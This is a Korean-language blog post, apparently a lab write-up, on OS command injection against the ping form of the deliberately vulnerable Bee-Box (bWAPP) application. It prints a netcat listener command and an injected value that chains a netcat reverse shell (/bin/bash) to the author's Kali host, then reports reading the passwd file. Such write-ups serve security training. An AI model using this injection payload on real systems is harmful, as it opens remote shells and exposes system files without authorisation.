OS Command Injection이란?
공격자가 서버에 임의의 운영 체제(OS) 명령을 실행하여 서버에 대한 정보를 획득하거나 데이터를 변조 및 삭제할 수 있는 웹 취약점이다.
페이지에 접근하면 자신의 IP주소를 입력하라는 창이 나오고 PING버튼을 누르면 골든 패킷을 캡처했냐는 문구가 나온다.
페이지의 소스코드 확인시 박스 안에 내용이 있을 경우 ping -c 1 "박스 내용" 명령어를 보내는 것을 확인하였다.
nc -vlp 5656
칼리 리눅스에서 넷켓을 사용하여 5656 포트를 열었다.
192.168.37.129&&nc -vn 192.168.37.128 5656 -e /bin/bash
위 코드를 삽입하여 칼리리눅스에 접근하였다. (칼리 리눅스 IP : 192.168.37.128)
비박스에서 접근이 완료된 것을 확인할수있다. (비박스 IP : 192.168.37.129)
이후 칼리리눅스에서 원격으로 비박스의 현재 위치를 확인하고 (pwd) passwd파일을 열었다.
'취약점 > Bee-Box' 카테고리의 다른 글
A1-Injection Server-Side Includes (SSI) Injection 비박스(bWAPP) (0) | 2019.12.07 |
---|---|
A1-Injection PHP Code Injection 비박스(bWAPP) (0) | 2019.12.04 |
A1-Injection OS Command Injection 비박스(bWAPP) (0) | 2019.12.02 |
A1-Injection Mail Header Injection (SMTP) 비박스(bWAPP) (2) | 2019.12.01 |
A-1 Injection iFrame Injection 비박스(bWAPP) (0) | 2019.11.30 |